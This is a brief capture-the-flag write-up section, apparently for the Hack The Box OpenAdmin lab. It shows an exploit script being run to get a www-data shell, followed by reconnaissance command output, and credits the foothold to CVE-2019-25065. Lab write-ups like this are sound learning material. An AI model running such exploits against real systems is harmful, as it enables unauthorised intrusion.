OpenAdmin_Exploitation

Exploitation

---

I will execute the Exploit script

┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ ./47691.sh
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ hostname
openadmin
$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.171  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:4ef2  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:4ef2  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:4e:f2  txqueuelen 1000  (Ethernet)
        RX packets 1971478  bytes 365568113 (365.5 MB)
        RX errors 0  dropped 19  overruns 0  frame 0
        TX packets 1973680  bytes 963843939 (963.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 12443  bytes 983826 (983.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12443  bytes 983826 (983.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established as openadmin via exploiting CVE-2019-25065